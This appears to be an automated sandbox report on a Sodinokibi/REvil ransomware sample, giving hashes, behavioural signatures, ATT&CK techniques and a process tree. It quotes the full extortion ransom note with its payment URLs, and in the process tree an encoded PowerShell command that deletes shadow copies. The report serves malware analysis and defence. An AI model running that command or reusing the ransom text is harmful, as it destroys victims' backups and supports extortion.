Analysis

  • max time kernel
    166s
  • max time network
    181s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 00:57

General

  • Target

    d63d1c46b1e83d54ad1d37bd0c8b62447060af35f53296c3059d75dc4d3fa15c.exe

  • Size

    164KB

  • MD5

    1f0e494c8ed568615a04c265879ccd8e

  • SHA1

    508eb9d543c3dd502989107029050ace012a59b9

  • SHA256

    d63d1c46b1e83d54ad1d37bd0c8b62447060af35f53296c3059d75dc4d3fa15c

  • SHA512

    696f44f8c31c0a4e6e1b4b7b22b95e51eca607731847d90cc258ed1d9502e8d3b94757d5f45df1759f02439694df9bb5c9c7f7de532afce2faca01ca18d1938e

Malware Config

Extracted

Path

C:\d396shm1v5-wannadie.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension d396shm1v5. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/65B33E4822F7FB4D 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/65B33E4822F7FB4D Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 8VTzp9WeoDVgxadgBo5QQrsfxGbFCXiW0PAsHGvcC+jaMd04CfJD7SCGP/pA++PE 5iokovoq0dxhEauE9ONEhSZ98RkvCWArbd+k6NVtIqAB+j2Sy/Xeh+1fYHq/u029 jv7HZlreEqtTjeVg7Bulcrsansq/2T8x9Bu3OLC4bgbjX5fP8kYXuwDOufrbkEI5 4JAmf/WnWhWoGM/kiNSk37eWGuIFrtQeYUCI6LCln3NZW6ZKnIfdz3+3GgUMnBoC ou8nhgr9HnS7jkInCPaYkJy1i0WBbFFRgBw8bFsATpdvaY9MwDyiUKfDM+XKtiUt Y0RxGWzTqVs6HwSOJKGk7grdiZeqgZ0AIkLSGirINIGlWjIn/BXmp9/B7p0BTaIb I9MRwNryyWJDea7Qy7vr1806yh9azo5z2kaapIlFH3ApmCPnqnbTENmKtzGuAHyj k8EhyssJu936S14KN6sHEH5h3kVUjGjrreqD/4NKECdDUATg5bsXBviXBnn1tgcZ LaN8rPCW3hCrMBbEOiEzJY+D1rNG74U9YEx3sdEBIC5RQ3RcsPnZVAYTGfZc/Lql k7po1PwjfQwJixFs0LyNXCxmC8INc3ykSyKzPEpdO3a1L2miC3CAvYlqZly57dgO jiZqDd6nVPFBg3yixFlW+feIgJH2WjBBpR/25e1iilvSrM9tXwehfpvjXSXC9TuU EDGwP4BNwE4yVAiXCnW7Mg9bwniCZdT2wNZdCVe0C+pK45Ig/5ulf0OAO/fHukVQ PhLMiY9/MF9ZL7SKMR3vgGEii5odZVmp2qnb0QWtcP/GEQLCKSGSPzXRI013JDFj Yn//Bo1SV7bA3wCENtKvtDYRcWOx+D67D06cA9NlgbvdAO1R7Q38wjw0iNCtjkiY 7vawge6BePsz8/GAAGpoXwcycj7XM2U58EY3CvoKMEoRX0b97scD84KuYr06xDXl 3BMmr93SphR520JmnI4n6jXDVylWyqg2vVLlIhtgglKhTRqdnOBzotJd+lizgLpA 4MJteOW7bucbQwE9waaeJuPQIyreykB1jTCtr1G8IxlQIPxYwHVOzJilVUPzfBDE 6e1Z9bUE/Iqa2VkHpdE/s73jdSjB857WUsBRvIKMnnhTzkVO7NnoNp6MfmKmrIdZ 1V3beg== Extension name: d396shm1v5 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/65B33E4822F7FB4D

http://decryptor.top/65B33E4822F7FB4D

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 24 IoCs
  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d63d1c46b1e83d54ad1d37bd0c8b62447060af35f53296c3059d75dc4d3fa15c.exe
    "C:\Users\Admin\AppData\Local\Temp\d63d1c46b1e83d54ad1d37bd0c8b62447060af35f53296c3059d75dc4d3fa15c.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2632
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:432
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2420

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2632-127-0x000001F6FD650000-0x000001F6FD672000-memory.dmp
      Filesize

      136KB

    • memory/2632-128-0x000001F6FB670000-0x000001F6FB672000-memory.dmp
      Filesize

      8KB

    • memory/2632-129-0x000001F6FB673000-0x000001F6FB675000-memory.dmp
      Filesize

      8KB

    • memory/2632-134-0x000001F6FD800000-0x000001F6FD876000-memory.dmp
      Filesize

      472KB

    • memory/3544-117-0x0000000000960000-0x0000000000983000-memory.dmp
      Filesize

      140KB

    • memory/3544-118-0x0000000000960000-0x0000000000983000-memory.dmp
      Filesize

      140KB

    • memory/3544-119-0x0000000000A10000-0x0000000000A11000-memory.dmp
      Filesize

      4KB

    • memory/3544-120-0x0000000000A20000-0x0000000000A21000-memory.dmp
      Filesize

      4KB

    • memory/3544-121-0x0000000000BE0000-0x0000000000BE6000-memory.dmp
      Filesize

      24KB